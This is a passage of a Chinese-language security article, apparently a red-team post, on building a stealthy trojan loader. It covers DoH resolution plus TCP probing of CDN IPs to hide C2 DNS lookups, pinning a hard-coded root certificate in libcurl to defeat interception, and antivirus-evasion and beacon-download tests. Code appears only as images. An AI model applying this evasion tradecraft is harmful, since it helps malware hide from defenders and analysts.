style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">当他们</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">杀疯了</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">的时候是有</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">可能会</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">批量封锁</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">CDN的IP</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">的</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">；</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">或者某些CDN节点IP本来就是暂时失效的，所以通过DoH查询得到的IP列表并不一定都可达</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">。</span></span></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">因此</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">我</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">在轮询查询的逻辑</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">中</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">添加了一个TCP端口探测的功能，</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">即</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">下图中</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">调用</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">的isTCPPortOpen()方法。当前节点IP的特定端口无法访问时，切换下一个节点IP进行测试，如果可以建立TCP三次握手则返回这个验证可达的IP地址。</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="mso-bookmark:iXVNZ;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.4257748776508972" style="width:601.8091430664062px;height:261.20001220703125px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=ceeca061&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeqdIEZfnicx9H8txuplRwbNbe62DnibhL3icZI2AngxlZPHXgc10jeJNoA%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:iXVNZ;"></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">使用方法如下，在调用secureGetHostByName()的时候加一个参数指定需要探测连通性的端口即可，由于CDN使用https协议，这个端口通常是443。</span></span><span style="mso-bookmark:ua58ccfe8;"><span style="mso-bookmark:Dol12;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.09624796084828711" style="width:601.8091430664062px;height:58.869998931884766px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=33908bfa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeC58d0qoubDnZbfwlPoYIMX0t3lzcq58ibnmwhXfqRVf8WXAKKlYcGaA%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:Dol12;"></span><span style="mso-bookmark:ua58ccfe8;"><span style="font-family:Calibri;"></span></span></p><h3 style="line-height: 2em;margin-bottom: 8px;"><strong><span style="font-size: 20px;"><span style="font-size: 20px;font-family: 宋体;">2.4 服务端证书校验</span>
  </span></strong></h3><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:Y4RCM;"></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">使用https的代码都是基于libcurl二次封装的，而libcurl默认状态就是支持证书校验的但这里有个天坑，掉进去了多半天才爬出来......libcurl的API参数名字容易产生误解，简而言之就是CURLOPT_SSL_VERIFYPEER开关才是验证证书有效性，而CURLOPT_SSL_VERIFYHOST开关其实只是验证证书里面的CN/SAN等字段和请求的URL种的域名/IP是否吻合，但并不会验证证书的有效性。</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">详细说明</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">如下。</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="mso-bookmark:sCWM3;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.6704730831973899" style="width:601.8091430664062px;height:410.8699951171875px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=f56d23e9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzel4Jia4rVibLhBTNh8V5Rg02R5vRu0mGlc6DyXr4Eek6AP4LYbF6zv8ww%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:sCWM3;"></span><span style="mso-bookmark:ud2ccdd52;"><span style="mso-bookmark:OLZdF;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.5595432300163132" style="width:601.8091430664062px;height:343.4100036621094px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=4c690294&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeFR6fqdptRRWyX60JM9ib4fm7uyiasgCtDhde3ashpxmsIB3hYMlS3iakQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:OLZdF;"></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">举个例子，比如挂上代理后通过burp访问百度，我们看到的证书是这样的：</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="mso-bookmark:v1RgJ;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.6786296900489397" style="width:601.8091430664062px;height:416.4100036621094px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=43ec26a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeVOxp0hicnTgZcHXibCTA4Cu75iajAa0DaicPRvQm4YZyjFq59Bm70qQG1w%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:v1RgJ;"></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">很显然，证书被burp替换了，浏览器会告警；这时候如果再访问搜狐，看到的证书是这样的：</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="mso-bookmark:GWEFx;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.7879282218597063" style="width:601.8091430664062px;height:482.6700134277344px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=0801d4a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeYJnqlg2Mw4lJvZRyx0wYynoD14SDo3cPXD5BJeGs42BtD6V5PgQpEw%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:GWEFx;"></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">burp是会根据我们访问的host来动态修改证书的，而并不关心证书是否有效。如下图可以看到，右边被修改过的证书在Windows下会提示损坏，而左边的则是burp直接导出的自签名证书。</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="mso-bookmark:ZUe1Q;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.6606851549755302" style="width:601.8091430664062px;height:405.4100036621094px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=5cd6ea99&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeibW0pzYjSXe8IPJUdpN0ibnv3ZSLy1mpHhnibZawDQAicPEY3d51cJcAOw%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:ZUe1Q;"></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">因此如果没仔细看API文档，以为“PEER”代表的是客户端证书校验，那就根本起不到防中间人的作用。但是开启证书校验后我们需要根CA证书来验证信任链，而对于</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">一个需要尽可能不做可疑行为的</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">木马来说</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">，</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">肯定不能去用户的文件系统里搜索根证书，也最好不要随便释放文件。所以我们可以将自己携带根证书的数据（硬编码），用CURLOPT_CAINFO_BLOB来直接从内存里加载根证书，如下（这里要先设置CURLOPT_CAINFO为空指针，阻止libcurl</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">优先</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">去文件系统中找根证书的数据）。</span></span><span style="mso-bookmark:ud2ccdd52;"><span style="mso-bookmark:J73EH;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.12071778140293637" style="width:601.8091430664062px;height:74.06999969482422px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=7e4bac17&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeGDibGazVkJNC0IQI0Jicq0Dx1zvdSicjPiaicerfYq0wImrwqKQXVVvLXEg%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:J73EH;"></span><span style="mso-bookmark:ud2ccdd52;"><span style="font-family:Calibri;"></span></span></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:ud2ccdd52;"><span style="mso-bookmark:J73EH;"><span style="font-family:宋体;"><br/></span></span></span></p><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:ud2ccdd52;"></span></h2><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="line-height: 2em;margin-bottom: 8px;"><br/></h2><h2 style="line-height: 2em;margin-bottom: 8px;"><strong><span style="font-size: 24px;"><span style="font-size: 24px;font-family: 宋体;">3. 测试</span>
  </span></strong></h2><h3 style="line-height: 2em;margin-bottom: 8px;"><strong><span style="font-size: 20px;"><span style="font-size: 20px;font-family: 宋体;">3.1 免杀测试</span>
  </span></strong></h3><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:k6PSc;"></span><span style="mso-bookmark:uccea4259;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">简易的loader（没做任何源码</span></span><span style="mso-bookmark:uccea4259;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">和API</span></span><span style="mso-bookmark:uccea4259;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">处理）可过</span></span><span style="mso-bookmark:uccea4259;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">最新版</span></span><span style="mso-bookmark:uccea4259;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">360和火绒。</span></span><span style="mso-bookmark:uccea4259;"><span style="mso-bookmark:U7gxD;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.6150081566068516" style="width:601.8091430664062px;height:377.1400146484375px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=0b96a2f5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzepP8h3Ttlyice9NsQnnpku1rIXlibkQ0w5BreUx6Ss9XxO0zUrhcxiaM4A%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:U7gxD;"></span><span style="mso-bookmark:uccea4259;"><span style="mso-bookmark:fE6CU;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.6247960848287113" style="width:601.8091430664062px;height:382.6700134277344px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=be92e03d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDze2TEvjHL2EsWo67KDozT9Yv97aAzvw5RBQic6nCxlv1ff1nmJMGvJvUg%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:fE6CU;"></span><span style="mso-bookmark:uccea4259;"><span style="font-family:Calibri;"></span></span></p><h3 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: 宋体;">3.2 上线测试/流量分析</span></strong></span>  </h3><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:QcLSQ;"></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">如下图所示，可以正常上线，且从本地查看的所有网络行为均为https，看不到域名解析的动作。</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="mso-bookmark:d98Ve;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.24469820554649266" style="width:601.8091430664062px;height:150.27000427246094px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=8df617eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeTHicJ9FeKDZCNsjKbtulIH7keMD3rPapLJfwjlo3wJGYzCkaFeLo5hQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:d98Ve;"></span><span style="mso-bookmark:u8fc3ff1d;"><span style="mso-bookmark:vyR2x;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.7944535073409462" style="width:601.8091430664062px;height:486.94000244140625px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=5a5e049f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDze7NGJ7s76Mbjp3q7uBE6yF3G6ic6tPZF7vqm9jxotydDKKcGRGpoiaHSA%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:vyR2x;"></span><span style="mso-bookmark:u8fc3ff1d;"><span style="mso-bookmark:vqvhJ;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.4567699836867863" style="width:601.8091430664062px;height:280.2699890136719px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=d68b9b41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDze4sSAOSqcBDTbGns8aDXxE3nE6hBSXFxmutbWF58yFZoIkUNXsfbmZA%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:vqvhJ;"></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">抓取全部流量分析，可以发现没有关联C2域名的DNS请求，下面的DNS请求是测试demo中内置的360的DoH域名服务器的域名，如果不想有这个解析过程</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">的流量</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">也可以直接</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">硬编码</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">域名服务器的IP地址</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">（</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">通常情况下没有必要</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">）</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">。</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="mso-bookmark:wAmDH;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.18107667210440456" style="width:601.8091430664062px;height:111.0px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=77e0507f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzekTUbVBVcqXFnfDESC3HXzET2H2e2ibIoXficCs7mzJCTic5cItLsRYRAQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:wAmDH;"></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">剩下的就全都是TLS加密流量了</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">，</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">对端IP是CDN节点</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">。</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="mso-bookmark:D5b7s;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.36867862969004894" style="width:601.8091430664062px;height:225.6699981689453px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=bb8a925f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzekGNtiaRichp5rpg4x1NFUaEJob28w7CqXoaSKC0Wolbk48aPFT9ib1f7g%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:D5b7s;"></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">而握手过程中JA3指纹也是</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">Open</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">SSL库默认的，并没有什么</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">特征</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">。</span></span><span style="mso-bookmark:u8fc3ff1d;"><span style="mso-bookmark:yQkFi;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.34910277324632955" style="width:601.8091430664062px;height:214.0px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=f0ca0e38&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzexXjAbaxaZyUUzb0dQHXXfh35k5OTh1NZicUtuO0jYT15XrbJaDHQ9Lg%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:yQkFi;"></span><span style="mso-bookmark:u8fc3ff1d;"><span style="font-family:Calibri;"></span></span></p><h3 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:u8fc3ff1d;"></span></h3><h3 style="line-height: 2em;margin-bottom: 8px;"><strong><span style="font-size: 20px;"><span style="font-size: 20px;font-family: 宋体;">3.3 证书替换测试</span>
  </span></strong></h3><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:AtszF;"></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">没开启代理的时候运行程序（</span></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">为</span></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">方便查看</span></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">细节，下面图中</span></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">开启了Debug信息输出），可以通过证书校验并成功请求域名然后下载加密的beacon，如下。</span></span><span style="mso-bookmark:u3004e0d1;"><span style="mso-bookmark:Ae2p8;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.9200652528548124" style="width:601.8091430664062px;height:563.6099853515625px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=d08d5e60&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeOXvico2kjWcFNCYIl1msFZcV6IpiasSs6ggMpSQ3YSlibBBBtETFh7dwA%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:Ae2p8;"></span><span style="mso-bookmark:u3004e0d1;"><span style="mso-bookmark:c51PD;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.5399673735725938" style="width:601.8091430664062px;height:330.5400085449219px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=75ca53b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeCzQePsOuTmcg0WTbxyPia2bDAibDXpHD8iakk4dtfqmgLrqEJEYUo8lsQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:c51PD;"></span><span style="mso-bookmark:u3004e0d1;"><span style="mso-bookmark:Qqclt;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="1.1941272430668841" style="width:601.8091430664062px;height:731.6099853515625px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=76c79e5d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeLqSc1sLfWJ9X9JibODQtLsAQfeooHqiaYiaEmC4JWhbaHvmsy7UNU2OOQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:Qqclt;"></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">开启代理后，可以看到burp自作聪明的给伪造了个域名，但实际上我们的host写的是ip，因此直接就没有通过host校验，程序退出。</span></span><span style="mso-bookmark:u3004e0d1;"><span style="mso-bookmark:GZ5zE;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.3278955954323002" style="width:601.8091430664062px;height:201.13999938964844px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=7a8332cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeyHVoOhpPfFWJ6RQmAOnhR8YiaH1DVj8WoQwBcoC3qAYllEia7G4bicHmw%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:GZ5zE;"></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">如果我们放宽一些限制，关闭DoH部分的证书校验，再使用域名来请求DoH服务器，可以看到程序到链接C2-CDN的时候会由于证书校验没有通过而被终止。</span></span><span style="mso-bookmark:u3004e0d1;"><span style="mso-bookmark:BxeV3;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.867862969004894" style="width:601.8091430664062px;height:531.739990234375px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=b1d916a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDze4NKXja6BbcK82aDl3C78BzhL8ACticCe4jS6P8urf0n38GxBibMXn1cA%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:BxeV3;"></span><span style="mso-bookmark:u3004e0d1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">此时代理上也是没有抓到任何有效流量的。</span></span><span style="mso-bookmark:u3004e0d1;"><span style="mso-bookmark:AvWvu;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.5774877650897227" style="width:601.8091430664062px;height:354.4700012207031px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=2330ce98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeFZXia5Osch7icy2J3fKWhxXKCBbkDm7nLOVMDZdV2ryuWUvWbbZ8oOmw%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:AvWvu;"></span><span style="mso-bookmark:u3004e0d1;"><span style="font-family:Calibri;"></span></span></p><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:u3004e0d1;"></span></h2><h2 style="line-height: 2em;margin-bottom: 8px;"><br/></h2><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="line-height: 2em;margin-bottom: 8px;"><br/></h2><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 24px;"><strong>4. 简易版loader</strong></span><br/></h2><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:bBRb5;"><span style="font-family:宋体;">最后看一下这个简易版loader的本体</span></span><span 